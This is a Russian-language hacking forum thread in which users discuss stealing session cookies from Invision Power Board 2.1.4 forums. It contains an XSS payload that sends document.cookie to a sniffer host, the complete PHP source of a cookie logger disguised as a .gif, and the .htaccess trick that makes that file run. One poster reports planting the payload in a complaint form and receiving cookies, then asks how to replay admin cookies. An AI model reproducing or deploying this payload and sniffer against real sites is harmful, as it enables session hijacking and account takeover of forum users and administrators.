А вторая часть вопроса...
лазил по форуму нашел под версию ipb 2.1.4 эту xss
<script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script>
вот немогу понять обычно сниф сам скрипт замаскирован под gif
а вданной xss получается можно даже его изменить на php и тоже полетат куки ?!
Хмм всеже не догоняю кое что
вот есть сниф состоит он из трех файлов
.htaccess
image.gif -картинка
snif.gif - сам скрип снифа
------------------------------------------
содержание файла .htaccess : и зачем он нужен
Код:
AddType application/x-httpd-php snif.gif
содержание файла snif.gif
Код:
<? // nerezus, 2005, GPL v2 // IF U WANNA USE .png(or .gif, .jpeg) EXT FOR THIS FILE, TYPE AddType application/x-httpd-php .png TO YOUR .htaccess $log="log.txt"; $file = fopen ($log, "a+"); $qu=UrlDecode(getenv('QUERY_STRING')); $ref=UrlDecode(getenv('HTTP_REFERER')); $ip=getenv('REMOTE_ADDR'); $now = getdate(); $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds']; $str="[$nowstring] IP=$ip REFERER=$ref QUERY=$qu\n"; fputs ($file, $str); fclose($file); header('Location: image.gif'); ?>
А в этом скрипте script>http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script> скрип ссылается на сниф с расширением .php
Если я переименую gif на .php буду ли приходить куки
или можно сослаться на gif в данном xss под этот форум ?!
Последний раз редактировалось karabym; 25.12.2006 в 09:08..
Поставил я значь себе этот форум ipb 2.1.4
Кидаю скрип в жалобы
<script>img = new Image(); img.src = "http:/мой_веб/сниффер.php?"+location.host+document.cookie ;</script>
Куки пришли
Но почему потом при замене кукисов в опере для обычного юзера нечего не происходит как был юзером так и остается некакой админки и духу нет ?!
Последний раз редактировалось karabym; 25.12.2006 в 12:21..
это не инъекция, это просто оператор выборки из MySQL, выбирается соль юзера с таким-то ид из таблицы ibf_members_converge. Чтобы это выполнить тебе нужено иметь доступ к базе данных форума.